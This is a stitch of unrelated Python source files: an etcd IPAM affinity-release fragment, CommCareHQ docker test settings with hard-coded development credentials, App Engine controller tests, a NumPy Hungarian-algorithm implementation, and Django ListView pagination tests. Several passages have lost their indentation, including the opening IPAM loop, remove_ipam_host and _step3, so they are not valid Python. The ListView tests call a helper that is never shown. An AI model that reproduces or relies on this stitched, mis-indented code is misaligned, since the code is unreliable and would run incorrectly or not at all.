# the block is owned by another host - we simply won't release that
# block.
_log.debug("Releasing affinities for %s", host)
for version in (4, 6):
cidrs = self._get_affine_blocks(host, version, None)
for cidr in cidrs:
try:
self._release_block_affinity(host, cidr)
except HostAffinityClaimedError:
_log.info("Affine block %s is not owned by host %s - skip",
cidr, host)
    @handle_errors
    def release_pool_affinities(self, pool):
        """
        Release affinities for all blocks in the specified pool.

        :param pool: The IP Pool.

        This may throw KeyError and HostAffinityClaimedError if another
        IPAM user is making conflicting changes.
        """
        for _ in range(KEY_ERROR_RETRIES):
            retry = False
            for host, block_cidr in self._get_host_block_pairs(pool):
                try:
                    self._release_block_affinity(host, block_cidr)
                except (KeyError, HostAffinityClaimedError):
                    # Hit a conflict - carry on with remaining CIDRs, but retry
                    # once we have finished with the current CIDR list.
                    retry = True
            if not retry:
                return
        # Too many retries - re-raise the last exception.
        # NOTE(review): this bare `raise` relies on Python 2 semantics, where
        # the most recently handled exception in this frame is still
        # available after the except block; under Python 3 it would fail with
        # "No active exception to re-raise" - confirm before porting.
        raise
@handle_errors
def remove_ipam_host(self, host):
"""
Remove an IPAM host. This removes all host affinities from the
existing allocation blocks, and removes the host specific IPAM data.
This method does not release individual IP address assigned by the
host - the IP addresses need to be released separately.
:param host: (optional) The host ID.
:return: nothing.
"""
# Get the host if not specified.
host = host or get_hostname()
# Release host affinities before removing the host tree,
self.release_host_affinities(host)
# Remove the host ipam tree.
host_path = IPAM_HOST_PATH % {"host": host}
try:
self.etcd_client.delete(host_path, dir=True, recursive=True)
except EtcdKeyNotFound:
pass
| |
####### Configuration for CommCareHQ Running in docker #######
import os


def _postgres_db(name):
    """Return a Postgres connection dict for the dockerized database."""
    return {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': name,
        'USER': 'commcarehq',
        'PASSWORD': 'commcarehq',
        'HOST': 'postgres',
        'PORT': '5432',
        'TEST': {
            'SERIALIZE': False,
        },
    }


DATABASES = {
    'default': _postgres_db('commcarehq'),
}

USE_PARTITIONED_DATABASE = os.environ.get('USE_PARTITIONED_DATABASE', 'no') == 'yes'

if USE_PARTITIONED_DATABASE:

    # Add the pl/proxy database plus the form-processing shard databases.
    DATABASES.update({
        'proxy': _postgres_db('commcarehq_proxy'),
        'p1': _postgres_db('commcarehq_p1'),
        'p2': _postgres_db('commcarehq_p2'),
    })

    PARTITION_DATABASE_CONFIG = {
        'shards': {
            'p1': [0, 1],
            'p2': [2, 3]
        },
        'groups': {
            'main': ['default'],
            'proxy': ['proxy'],
            'form_processing': ['p1', 'p2'],
        },
        'host_map': {
            'postgres': 'localhost'
        }
    }
####### Couch Config ######
COUCH_HTTPS = False
COUCH_SERVER_ROOT = 'couch:5984'
COUCH_USERNAME = ''
COUCH_PASSWORD = ''
COUCH_DATABASE_NAME = 'commcarehq'

####### Redis / cache config ######
redis_host = 'redis'

# A single backend definition shared by both cache aliases.
redis_cache = {
    'BACKEND': 'django_redis.cache.RedisCache',
    'LOCATION': 'redis://{}:6379/0'.format(redis_host),
    'OPTIONS': {},
}

CACHES = {
    'default': redis_cache,
    'redis': redis_cache
}

WS4REDIS_CONNECTION = {
    'host': redis_host,
}

####### Elasticsearch / blob storage / messaging ######
ELASTICSEARCH_HOST = 'elasticsearch'
ELASTICSEARCH_PORT = 9200

S3_BLOB_DB_SETTINGS = {
    "url": "http://riakcs:9980/",
    "access_key": "admin-key",
    "secret_key": "admin-secret",
    "config": {"connect_timeout": 3, "read_timeout": 5},
}

KAFKA_URL = 'kafka:9092'

# Fix: this was previously assigned twice with the same value; the redundant
# duplicate assignment has been removed.
SHARED_DRIVE_ROOT = '/sharedfiles'

ALLOWED_HOSTS = ['*']
#FIX_LOGGER_ERROR_OBFUSCATION = True

# faster compressor that doesn't do source maps
COMPRESS_JS_COMPRESSOR = 'compressor.js.JsCompressor'

# Run celery tasks synchronously in-process.
CELERY_ALWAYS_EAGER = True
CELERY_EAGER_PROPAGATES_EXCEPTIONS = True

INACTIVITY_TIMEOUT = 60 * 24 * 365
CSRF_SOFT_MODE = False
BASE_ADDRESS = '{}:8000'.format(os.environ.get('HQ_PORT_8000_TCP_ADDR', 'localhost'))
######## Email setup ########
# email settings: these ones are the custom hq ones
EMAIL_LOGIN = "notifications@dimagi.com"
EMAIL_PASSWORD = "******"
EMAIL_SMTP_HOST = "smtp.gmail.com"
EMAIL_SMTP_PORT = 587
# Print outgoing mail to the console instead of actually sending it.
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
####### Bitly ########
BITLY_LOGIN = None
####### Jar signing config ########
# Paths are resolved relative to this settings file's directory.
_ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
JAR_SIGN = {
    "jad_tool": os.path.join(_ROOT_DIR, "corehq", "apps", "app_manager", "JadTool.jar"),
    "key_store": os.path.join(_ROOT_DIR, "InsecureTestingKeyStore"),
    "key_alias": "javarosakey",
    "store_pass": "onetwothreefourfive",
    "key_pass": "onetwothreefourfive",
}
AUDIT_MODEL_SAVE = ['django.contrib.auth.models.User']
AUDIT_ADMIN_VIEWS = False
# NOTE(review): hard-coded secret key - acceptable only because this settings
# file targets local docker/test environments.
SECRET_KEY = 'secrettravis'
# No logging: route everything to a NullHandler at CRITICAL level.
LOCAL_LOGGING_HANDLERS = {
    'null': {
        'level': 'DEBUG',
        'class': 'logging.NullHandler',
    },
}
LOCAL_LOGGING_LOGGERS = {
    '': {
        'level': 'CRITICAL',
        'handler': 'null',
        'propagate': True,
    },
    'pillowtop': {
        'level': 'CRITICAL',
        'handler': 'null',
        'propagate': True,
    },
    'notify': {
        'level': 'CRITICAL',
        'handler': 'null',
        'propagate': True,
    },
}
PHONE_TIMEZONES_HAVE_BEEN_PROCESSED = True
PHONE_TIMEZONES_SHOULD_BE_PROCESSED = True
ENABLE_PRELOGIN_SITE = True
TESTS_SHOULD_TRACK_CLEANLINESS = True
# touchforms must be running when this is false or not set
# see also corehq.apps.sms.tests.util.TouchformsTestCase
SKIP_TOUCHFORMS_TESTS = True
UNIT_TESTING = True
PILLOWTOP_MACHINE_ID = 'testhq'
ELASTICSEARCH_VERSION = 1.7
CACHE_REPORTS = True
# When bootstrapping a dev environment rather than running tests, switch off
# test mode.
if os.environ.get("COMMCAREHQ_BOOTSTRAP") == "yes":
    UNIT_TESTING = False
ADMINS = (('Admin', 'admin@example.com'),)
CELERY_SEND_TASK_ERROR_EMAILS = True
LESS_DEBUG = True
LESS_WATCH = False
COMPRESS_OFFLINE = False
XFORMS_PLAYER_URL = 'http://127.0.0.1:4444'
TOUCHFORMS_API_USER = 'admin@example.com'
TOUCHFORMS_API_PASSWORD = 'password'
CCHQ_API_THROTTLE_REQUESTS = 200
CCHQ_API_THROTTLE_TIMEFRAME = 10
RESTORE_PAYLOAD_DIR_NAME = 'restore'
SHARED_TEMP_DIR_NAME = 'temp'
| |
import unittest2
import webapp2
import webtest
from datetime import datetime
from google.appengine.datastore import datastore_stub_util
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from webapp2_extras.routes import RedirectRoute
from consts.account_permissions import AccountPermissions
from consts.district_type import DistrictType
from consts.event_type import EventType
from controllers.suggestions.suggest_match_video_review_controller import \
SuggestMatchVideoReviewController
from helpers.suggestions.suggestion_creator import SuggestionCreator
from models.account import Account
from models.event import Event
from models.match import Match
from models.suggestion import Suggestion
class TestSuggestMatchVideoReviewController(unittest2.TestCase):
    """Tests for the match-video suggestion review page.

    Exercises the login/permission gating and the accept / accept-with-new-key
    / reject flows, using the GAE testbed stubs for datastore, memcache, users,
    urlfetch and the task queue.
    """

    def setUp(self):
        # Fully-consistent datastore policy (probability=1) so writes are
        # immediately visible to subsequent queries.
        self.policy = datastore_stub_util.PseudoRandomHRConsistencyPolicy(probability=1)
        self.testbed = testbed.Testbed()
        self.testbed.activate()
        self.testbed.init_datastore_v3_stub(consistency_policy=self.policy)
        self.testbed.init_memcache_stub()
        self.testbed.init_user_stub()
        self.testbed.init_urlfetch_stub()
        self.testbed.init_taskqueue_stub(_all_queues_valid=True)
        ndb.get_context().clear_cache()  # Prevent data from leaking between tests
        # Minimal WSGI app exposing only the controller under test.
        app = webapp2.WSGIApplication([
            RedirectRoute(r'/suggest/match/video/review', SuggestMatchVideoReviewController, 'suggest-video', strict_slash=True),
        ], debug=True)
        self.testapp = webtest.TestApp(app)
        # Fixture event that the fixture matches below belong to.
        self.event = Event(
            id="2016necmp",
            name="New England District Championship",
            event_type_enum=EventType.DISTRICT_CMP,
            event_district_enum=DistrictType.NEW_ENGLAND,
            short_name="New England",
            event_short="necmp",
            year=2016,
            end_date=datetime(2016, 03, 27),
            official=False,
            city='Hartford',
            state_prov='CT',
            country='USA',
            venue="Some Venue",
            venue_address="Some Venue, Hartford, CT, USA",
            timezone_id="America/New_York",
            start_date=datetime(2016, 03, 24),
            webcast_json="",
            website="http://www.firstsv.org"
        )
        self.event.put()
        # The match the suggestion is created against.
        self.match = Match(
            id="2016necmp_f1m1",
            event=ndb.Key(Event, "2016necmp"),
            year=2016,
            comp_level="f",
            set_number=1,
            match_number=1,
            team_key_names=['frc846', 'frc2135', 'frc971', 'frc254', 'frc1678', 'frc973'],
            time=datetime.fromtimestamp(1409527874),
            time_string="4:31 PM",
            tba_videos=[],
            alliances_json='{\
                "blue": {\
                    "score": 270,\
                    "teams": [\
                    "frc846",\
                    "frc2135",\
                    "frc971"]},\
                "red": {\
                    "score": 310,\
                    "teams": [\
                    "frc254",\
                    "frc1678",\
                    "frc973"]}}',
            score_breakdown_json='{\
                "blue": {\
                    "auto": 70,\
                    "teleop_goal+foul": 40,\
                    "assist": 120,\
                    "truss+catch": 40\
                },"red": {\
                    "auto": 70,\
                    "teleop_goal+foul": 50,\
                    "assist": 150,\
                    "truss+catch": 40}}'
        )
        self.match.put()
        # A second match used by the "accept with a different key" test.
        self.match2 = Match(
            id="2016necmp_f1m2",
            event=ndb.Key(Event, "2016necmp"),
            year=2016,
            comp_level="f",
            set_number=1,
            match_number=2,
            team_key_names=['frc846', 'frc2135', 'frc971', 'frc254', 'frc1678', 'frc973'],
            time=datetime.fromtimestamp(1409527874),
            time_string="4:31 PM",
            tba_videos=[],
            alliances_json='{\
                "blue": {\
                    "score": 270,\
                    "teams": [\
                    "frc846",\
                    "frc2135",\
                    "frc971"]},\
                "red": {\
                    "score": 310,\
                    "teams": [\
                    "frc254",\
                    "frc1678",\
                    "frc973"]}}',
            score_breakdown_json='{\
                "blue": {\
                    "auto": 70,\
                    "teleop_goal+foul": 40,\
                    "assist": 120,\
                    "truss+catch": 40\
                },"red": {\
                    "auto": 70,\
                    "teleop_goal+foul": 50,\
                    "assist": 150,\
                    "truss+catch": 40}}'
        )
        self.match2.put()

    def tearDown(self):
        self.testbed.deactivate()

    def loginUser(self):
        """Log in a non-admin user and ensure a matching Account exists."""
        self.testbed.setup_env(
            user_email="user@example.com",
            user_id="123",
            user_is_admin='0',
            overwrite=True
        )
        self.account = Account.get_or_insert(
            "123",
            email="user@example.com",
            registered=True
        )

    def givePermission(self):
        """Grant the logged-in account media-review permission."""
        self.account.permissions.append(AccountPermissions.REVIEW_MEDIA)
        self.account.put()

    def createSuggestion(self):
        """Create a pending video suggestion and return its key name."""
        status = SuggestionCreator.createMatchVideoYouTubeSuggestion(self.account.key,
                                                                    "H-54KMwMKY0",
                                                                    "2016necmp_f1m1")
        self.assertEqual(status, 'success')
        return Suggestion.render_media_key_name(2016, 'match', '2016necmp_f1m1', 'youtube', 'H-54KMwMKY0')

    def getSuggestionForm(self):
        """Fetch the review page and return its review_videos form."""
        response = self.testapp.get('/suggest/match/video/review')
        self.assertEqual(response.status_int, 200)
        form = response.forms.get('review_videos', None)
        self.assertIsNotNone(form)
        return form

    def test_login_redirect(self):
        """Anonymous users are redirected to the login-required page."""
        response = self.testapp.get('/suggest/match/video/review', status='3*')
        response = response.follow(expect_errors=True)
        self.assertTrue(response.request.path.startswith("/account/login_required"))

    def test_no_permissions(self):
        """Logged-in users without REVIEW_MEDIA are redirected home."""
        self.loginUser()
        response = self.testapp.get('/suggest/match/video/review', status='3*')
        response = response.follow(expect_errors=True)
        self.assertEqual(response.request.path, '/')

    def test_nothing_to_review(self):
        """The page renders when there are no pending suggestions."""
        self.loginUser()
        self.givePermission()
        response = self.testapp.get('/suggest/match/video/review')
        self.assertEqual(response.status_int, 200)

    def test_accept_suggestion(self):
        """Accepting a suggestion marks it accepted and attaches the video."""
        self.loginUser()
        self.givePermission()
        suggestion_id = self.createSuggestion()
        form = self.getSuggestionForm()
        form['accept_reject-{}'.format(suggestion_id)] = 'accept::{}'.format(suggestion_id)
        response = form.submit().follow()
        self.assertEqual(response.status_int, 200)
        # Make sure we mark the Suggestion as ACCEPTED
        suggestion = Suggestion.get_by_id(suggestion_id)
        self.assertIsNotNone(suggestion)
        self.assertEqual(suggestion.review_state, Suggestion.REVIEW_ACCEPTED)
        # Make sure the video gets associated
        match = Match.get_by_id(self.match.key_name)
        self.assertIsNotNone(match)
        self.assertIsNotNone(match.youtube_videos)
        self.assertTrue('H-54KMwMKY0' in match.youtube_videos)

    def test_accept_new_key(self):
        """Accepting with an overridden key attaches the video to that match."""
        self.loginUser()
        self.givePermission()
        suggestion_id = self.createSuggestion()
        form = self.getSuggestionForm()
        form['accept_reject-{}'.format(suggestion_id)] = 'accept::{}'.format(suggestion_id)
        form['key-{}'.format(suggestion_id)] = '2016necmp_f1m2'
        response = form.submit().follow()
        self.assertEqual(response.status_int, 200)
        # Make sure we mark the Suggestion as ACCEPTED
        suggestion = Suggestion.get_by_id(suggestion_id)
        self.assertIsNotNone(suggestion)
        self.assertEqual(suggestion.review_state, Suggestion.REVIEW_ACCEPTED)
        # Make sure the video gets associated
        match = Match.get_by_id(self.match2.key_name)
        self.assertIsNotNone(match)
        self.assertIsNotNone(match.youtube_videos)
        self.assertTrue('H-54KMwMKY0' in match.youtube_videos)
        # Make sure we don't add it to the first match
        match = Match.get_by_id(self.match.key_name)
        self.assertIsNotNone(match)
        self.assertIsNotNone(match.youtube_videos)
        self.assertFalse('H-54KMwMKY0' in match.youtube_videos)

    def test_accept_bad_key(self):
        """Accepting with a nonexistent key leaves the suggestion pending."""
        self.loginUser()
        self.givePermission()
        suggestion_id = self.createSuggestion()
        form = self.getSuggestionForm()
        form['accept_reject-{}'.format(suggestion_id)] = 'accept::{}'.format(suggestion_id)
        form['key-{}'.format(suggestion_id)] = '2016necmp_f1m3'  # This match doesn't exist
        response = form.submit().follow()
        self.assertEqual(response.status_int, 200)
        # Make sure we don't mark the Suggestion as REVIEWED
        suggestion = Suggestion.get_by_id(suggestion_id)
        self.assertIsNotNone(suggestion)
        self.assertEqual(suggestion.review_state, Suggestion.REVIEW_PENDING)
        # Make sure the video doesn't get associated
        match = Match.get_by_id(self.match.key_name)
        self.assertIsNotNone(match)
        self.assertIsNotNone(match.youtube_videos)
        self.assertFalse('H-54KMwMKY0' in match.youtube_videos)

    def test_reject_suggestion(self):
        """Rejecting a suggestion marks it rejected; no video is attached."""
        self.loginUser()
        self.givePermission()
        suggestion_id = self.createSuggestion()
        form = self.getSuggestionForm()
        form['accept_reject-{}'.format(suggestion_id)] = 'reject::{}'.format(suggestion_id)
        response = form.submit().follow()
        self.assertEqual(response.status_int, 200)
        # Make sure we mark the Suggestion as REJECTED
        suggestion = Suggestion.get_by_id(suggestion_id)
        self.assertIsNotNone(suggestion)
        self.assertEqual(suggestion.review_state, Suggestion.REVIEW_REJECTED)
        # Make sure the video does NOT get associated
        match = Match.get_by_id(self.match.key_name)
        self.assertIsNotNone(match)
        self.assertFalse(match.youtube_videos)
| |
# Hungarian algorithm (Kuhn-Munkres) for solving the linear sum assignment
# problem. Taken from scikit-learn. Based on original code by Brian Clapper,
# adapted to NumPy by Gael Varoquaux.
# Further improvements by Ben Root, Vlad Niculae and Lars Buitinck.
#
# Copyright (c) 2008 Brian M. Clapper <bmc@clapper.org>, Gael Varoquaux
# Author: Brian M. Clapper, Gael Varoquaux
# License: 3-clause BSD
import numpy as np
def linear_sum_assignment(cost_matrix):
    r"""Solve the linear sum assignment problem.

    The linear sum assignment problem is also known as minimum weight matching
    in bipartite graphs. A problem instance is described by a matrix C, where
    each C[i,j] is the cost of matching vertex i of the first partite set
    (a "worker") and vertex j of the second set (a "job"). The goal is to find
    a complete assignment of workers to jobs of minimal cost.

    Formally, let X be a boolean matrix where :math:`X[i,j] = 1` iff row i is
    assigned to column j. Then the optimal assignment has cost

    .. math::
        \min \sum_i \sum_j C_{i,j} X_{i,j}

    s.t. each row is assigned to at most one column, and each column to at
    most one row.

    This function can also solve a generalization of the classic assignment
    problem where the cost matrix is rectangular. If it has more rows than
    columns, then not every row needs to be assigned to a column, and vice
    versa.

    The method used is the Hungarian algorithm, also known as the Munkres or
    Kuhn-Munkres algorithm.

    Parameters
    ----------
    cost_matrix : array
        The cost matrix of the bipartite graph.

    Returns
    -------
    row_ind, col_ind : array
        An array of row indices and one of corresponding column indices giving
        the optimal assignment. The cost of the assignment can be computed
        as ``cost_matrix[row_ind, col_ind].sum()``. The row indices will be
        sorted; in the case of a square cost matrix they will be equal to
        ``numpy.arange(cost_matrix.shape[0])``.

    Notes
    -----
    .. versionadded:: 0.17.0

    Examples
    --------
    >>> cost = np.array([[4, 1, 3], [2, 0, 5], [3, 2, 2]])
    >>> from scipy.optimize import linear_sum_assignment
    >>> row_ind, col_ind = linear_sum_assignment(cost)
    >>> col_ind
    array([1, 0, 2])
    >>> cost[row_ind, col_ind].sum()
    5

    References
    ----------
    1. http://csclab.murraystate.edu/bob.pilgrim/445/munkres.html
    2. Harold W. Kuhn. The Hungarian Method for the assignment problem.
       *Naval Research Logistics Quarterly*, 2:83-97, 1955.
    3. Harold W. Kuhn. Variants of the Hungarian method for assignment
       problems. *Naval Research Logistics Quarterly*, 3: 253-258, 1956.
    4. Munkres, J. Algorithms for the Assignment and Transportation Problems.
       *J. SIAM*, 5(1):32-38, March, 1957.
    5. https://en.wikipedia.org/wiki/Hungarian_algorithm
    """
    cost_matrix = np.asarray(cost_matrix)
    if len(cost_matrix.shape) != 2:
        raise ValueError("expected a matrix (2-d array), got a %r array"
                         % (cost_matrix.shape,))
    # The algorithm expects more columns than rows in the cost matrix.
    if cost_matrix.shape[1] < cost_matrix.shape[0]:
        cost_matrix = cost_matrix.T
        transposed = True
    else:
        transposed = False
    state = _Hungary(cost_matrix)
    # No need to bother with assignments if one of the dimensions
    # of the cost matrix is zero-length.
    step = None if 0 in cost_matrix.shape else _step1
    # Run the state machine: each step function returns the next step to
    # execute, or None once the algorithm has terminated.
    while step is not None:
        step = step(state)
    # Undo the transpose (if any) before reading the starred zeros out of
    # the marked matrix.
    if transposed:
        marked = state.marked.T
    else:
        marked = state.marked
    return np.where(marked == 1)
class _Hungary(object):
    """State of the Hungarian algorithm.

    Parameters
    ----------
    cost_matrix : 2D matrix
        The cost matrix. Must have shape[1] >= shape[0].
    """

    def __init__(self, cost_matrix):
        # Work on a copy; the steps mutate C in place.
        self.C = cost_matrix.copy()
        n, m = self.C.shape
        # Row/column cover flags; True means the line is NOT covered.
        self.row_uncovered = np.ones(n, dtype=bool)
        self.col_uncovered = np.ones(m, dtype=bool)
        # Position of the uncovered primed zero found in step 4, consumed
        # by step 5.
        self.Z0_r = 0
        self.Z0_c = 0
        # Scratch storage for the alternating path built in step 5.
        self.path = np.zeros((n + m, 2), dtype=int)
        # Zero markings: 0 = unmarked, 1 = starred, 2 = primed.
        self.marked = np.zeros((n, m), dtype=int)

    def _clear_covers(self):
        """Clear all covered matrix cells"""
        self.row_uncovered[:] = True
        self.col_uncovered[:] = True
# Individual steps of the algorithm follow, as a state machine: they return
# the next step to be taken (function to be called), if any.
def _step1(state):
    """Steps 1 and 2 in the Wikipedia page."""
    # Step 1: create at least one zero in every row by subtracting each
    # row's minimum from that row.
    state.C -= state.C.min(axis=1)[:, np.newaxis]

    # Step 2: greedily star zeros, at most one per row and per column.  The
    # cover flags are used as scratch bookkeeping here and reset afterwards.
    zero_rows, zero_cols = np.where(state.C == 0)
    for row, col in zip(zero_rows, zero_cols):
        if state.col_uncovered[col] and state.row_uncovered[row]:
            state.marked[row, col] = 1
            state.col_uncovered[col] = False
            state.row_uncovered[row] = False

    state._clear_covers()
    return _step3
def _step3(state):
"""
Cover each column containing a starred zero. If n columns are covered,
the starred zeros describe a complete set of unique assignments.
In this case, Go to DONE, otherwise, Go to Step 4.
"""
marked = (state.marked == 1)
state.col_uncovered[np.any(marked, axis=0)] = False
if marked.sum() < state.C.shape[0]:
return _step4
def _step4(state):
    """
    Find a noncovered zero and prime it. If there is no starred zero
    in the row containing this primed zero, Go to Step 5. Otherwise,
    cover this row and uncover the column containing the starred
    zero. Continue in this manner until there are no uncovered zeros
    left. Save the smallest uncovered value and Go to Step 6.
    """
    # We convert to int as numpy operations are faster on int
    C = (state.C == 0).astype(int)
    # covered_C[i, j] == 1 exactly when C[i, j] is a zero lying in an
    # uncovered row AND an uncovered column.
    covered_C = C * state.row_uncovered[:, np.newaxis]
    covered_C *= np.asarray(state.col_uncovered, dtype=int)
    n = state.C.shape[0]
    m = state.C.shape[1]
    while True:
        # Find an uncovered zero
        row, col = np.unravel_index(np.argmax(covered_C), (n, m))
        if covered_C[row, col] == 0:
            # argmax found no 1 entry, i.e. no uncovered zero remains.
            return _step6
        else:
            state.marked[row, col] = 2
            # Find the first starred element in the row
            # (argmax on a boolean row returns 0 when there is no match,
            # so the value must be re-checked below).
            star_col = np.argmax(state.marked[row] == 1)
            if state.marked[row, star_col] != 1:
                # Could not find one
                state.Z0_r = row
                state.Z0_c = col
                return _step5
            else:
                col = star_col
                state.row_uncovered[row] = False
                state.col_uncovered[col] = True
                # Recompute coverage for the just-uncovered column and
                # clear the now-covered row.
                covered_C[:, col] = C[:, col] * (
                    np.asarray(state.row_uncovered, dtype=int))
                covered_C[row] = 0
def _step5(state):
    """
    Construct a series of alternating primed and starred zeros as follows.
    Let Z0 represent the uncovered primed zero found in Step 4.
    Let Z1 denote the starred zero in the column of Z0 (if any).
    Let Z2 denote the primed zero in the row of Z1 (there will always be one).
    Continue until the series terminates at a primed zero that has no starred
    zero in its column. Unstar each starred zero of the series, star each
    primed zero of the series, erase all primes and uncover every line in the
    matrix. Return to Step 3
    """
    count = 0
    path = state.path
    # The path starts at Z0, recorded by step 4.
    path[count, 0] = state.Z0_r
    path[count, 1] = state.Z0_c
    while True:
        # Find the first starred element in the col defined by
        # the path. (argmax returns 0 when there is no match, so the
        # value is re-checked below.)
        row = np.argmax(state.marked[:, path[count, 1]] == 1)
        if state.marked[row, path[count, 1]] != 1:
            # Could not find one
            break
        else:
            count += 1
            path[count, 0] = row
            path[count, 1] = path[count - 1, 1]
        # Find the first prime element in the row defined by the
        # first path step
        col = np.argmax(state.marked[path[count, 0]] == 2)
        if state.marked[row, col] != 2:
            col = -1
        count += 1
        path[count, 0] = path[count - 1, 0]
        path[count, 1] = col
    # Convert paths: toggle stars along the alternating path (starred
    # entries become unmarked, primed/unmarked entries become starred).
    for i in range(count + 1):
        if state.marked[path[i, 0], path[i, 1]] == 1:
            state.marked[path[i, 0], path[i, 1]] = 0
        else:
            state.marked[path[i, 0], path[i, 1]] = 1
    state._clear_covers()
    # Erase all prime markings
    state.marked[state.marked == 2] = 0
    return _step3
def _step6(state):
    """
    Add the value found in Step 4 to every element of each covered row,
    and subtract it from every element of each uncovered column.
    Return to Step 4 without altering any stars, primes, or covered lines.
    """
    # Only adjust when at least one row AND one column remain uncovered;
    # otherwise there is no uncovered entry to take the minimum over.
    if np.any(state.row_uncovered) and np.any(state.col_uncovered):
        column_mins = np.min(state.C[state.row_uncovered], axis=0)
        smallest = np.min(column_mins[state.col_uncovered])
        state.C[~state.row_uncovered] += smallest
        state.C[:, state.col_uncovered] -= smallest
    return _step4
| |
from __future__ import absolute_import
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from django.test.utils import override_settings
from django.views.generic.base import View
from django.utils.encoding import force_str
from .models import Author, Artist
class ListViewTests(TestCase):
    """Tests for the generic class-based ListView.

    Exercises plain and paginated listings, template selection and context
    variable naming through the URLs in ``regressiontests.generic_views.urls``.
    Several tests create their own Author rows via ``_make_authors``.
    """
    fixtures = ['generic-views-test-data.json']
    urls = 'regressiontests.generic_views.urls'
    def test_items(self):
        # A plain (non-queryset) list of dicts is rendered as-is.
        res = self.client.get('/list/dict/')
        self.assertEqual(res.status_code, 200)
        self.assertTemplateUsed(res, 'generic_views/list.html')
        self.assertEqual(res.context['object_list'][0]['first'], 'John')
    def test_queryset(self):
        res = self.client.get('/list/authors/')
        self.assertEqual(res.status_code, 200)
        self.assertTemplateUsed(res, 'generic_views/author_list.html')
        self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
        self.assertTrue(isinstance(res.context['view'], View))
        self.assertIs(res.context['author_list'], res.context['object_list'])
        # An unpaginated view exposes paginator/page_obj as None.
        self.assertIsNone(res.context['paginator'])
        self.assertIsNone(res.context['page_obj'])
        self.assertFalse(res.context['is_paginated'])
    def test_paginated_queryset(self):
        # 100 authors at 30 per page -> 4 pages.
        self._make_authors(100)
        res = self.client.get('/list/authors/paginated/')
        self.assertEqual(res.status_code, 200)
        self.assertTemplateUsed(res, 'generic_views/author_list.html')
        self.assertEqual(len(res.context['object_list']), 30)
        self.assertIs(res.context['author_list'], res.context['object_list'])
        self.assertTrue(res.context['is_paginated'])
        self.assertEqual(res.context['page_obj'].number, 1)
        self.assertEqual(res.context['paginator'].num_pages, 4)
        self.assertEqual(res.context['author_list'][0].name, 'Author 00')
        self.assertEqual(list(res.context['author_list'])[-1].name, 'Author 29')
    def test_paginated_queryset_shortdata(self):
        # Test that short datasets ALSO result in a paginated view.
        res = self.client.get('/list/authors/paginated/')
        self.assertEqual(res.status_code, 200)
        self.assertTemplateUsed(res, 'generic_views/author_list.html')
        self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
        self.assertIs(res.context['author_list'], res.context['object_list'])
        self.assertEqual(res.context['page_obj'].number, 1)
        self.assertEqual(res.context['paginator'].num_pages, 1)
        self.assertFalse(res.context['is_paginated'])
    def test_paginated_get_page_by_query_string(self):
        self._make_authors(100)
        res = self.client.get('/list/authors/paginated/', {'page': '2'})
        self.assertEqual(res.status_code, 200)
        self.assertTemplateUsed(res, 'generic_views/author_list.html')
        self.assertEqual(len(res.context['object_list']), 30)
        self.assertIs(res.context['author_list'], res.context['object_list'])
        self.assertEqual(res.context['author_list'][0].name, 'Author 30')
        self.assertEqual(res.context['page_obj'].number, 2)
    def test_paginated_get_last_page_by_query_string(self):
        self._make_authors(100)
        res = self.client.get('/list/authors/paginated/', {'page': 'last'})
        self.assertEqual(res.status_code, 200)
        # The final page holds the 10 leftover authors.
        self.assertEqual(len(res.context['object_list']), 10)
        self.assertIs(res.context['author_list'], res.context['object_list'])
        self.assertEqual(res.context['author_list'][0].name, 'Author 90')
        self.assertEqual(res.context['page_obj'].number, 4)
    def test_paginated_get_page_by_urlvar(self):
        self._make_authors(100)
        res = self.client.get('/list/authors/paginated/3/')
        self.assertEqual(res.status_code, 200)
        self.assertTemplateUsed(res, 'generic_views/author_list.html')
        self.assertEqual(len(res.context['object_list']), 30)
        self.assertIs(res.context['author_list'], res.context['object_list'])
        self.assertEqual(res.context['author_list'][0].name, 'Author 60')
        self.assertEqual(res.context['page_obj'].number, 3)
    def test_paginated_page_out_of_range(self):
        self._make_authors(100)
        res = self.client.get('/list/authors/paginated/42/')
        self.assertEqual(res.status_code, 404)
    def test_paginated_invalid_page(self):
        self._make_authors(100)
        res = self.client.get('/list/authors/paginated/?page=frog')
        self.assertEqual(res.status_code, 404)
    def test_paginated_custom_paginator_class(self):
        self._make_authors(7)
        res = self.client.get('/list/authors/paginated/custom_class/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.context['paginator'].num_pages, 1)
        # Custom pagination allows for 2 orphans on a page size of 5
        self.assertEqual(len(res.context['object_list']), 7)
    def test_paginated_custom_page_kwarg(self):
        self._make_authors(100)
        res = self.client.get('/list/authors/paginated/custom_page_kwarg/', {'pagina': '2'})
        self.assertEqual(res.status_code, 200)
        self.assertTemplateUsed(res, 'generic_views/author_list.html')
        self.assertEqual(len(res.context['object_list']), 30)
        self.assertIs(res.context['author_list'], res.context['object_list'])
        self.assertEqual(res.context['author_list'][0].name, 'Author 30')
        self.assertEqual(res.context['page_obj'].number, 2)
    def test_paginated_custom_paginator_constructor(self):
        self._make_authors(7)
        res = self.client.get('/list/authors/paginated/custom_constructor/')
        self.assertEqual(res.status_code, 200)
        # Custom pagination allows for 2 orphans on a page size of 5
        self.assertEqual(len(res.context['object_list']), 7)
    def test_paginated_orphaned_queryset(self):
        self._make_authors(92)
        res = self.client.get('/list/authors/paginated-orphaned/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.context['page_obj'].number, 1)
        res = self.client.get(
            '/list/authors/paginated-orphaned/', {'page': 'last'})
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.context['page_obj'].number, 3)
        res = self.client.get(
            '/list/authors/paginated-orphaned/', {'page': '3'})
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.context['page_obj'].number, 3)
        res = self.client.get(
            '/list/authors/paginated-orphaned/', {'page': '4'})
        self.assertEqual(res.status_code, 404)
    def test_paginated_non_queryset(self):
        res = self.client.get('/list/dict/paginated/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(len(res.context['object_list']), 1)
    def test_verbose_name(self):
        res = self.client.get('/list/artists/')
        self.assertEqual(res.status_code, 200)
        self.assertTemplateUsed(res, 'generic_views/list.html')
        self.assertEqual(list(res.context['object_list']), list(Artist.objects.all()))
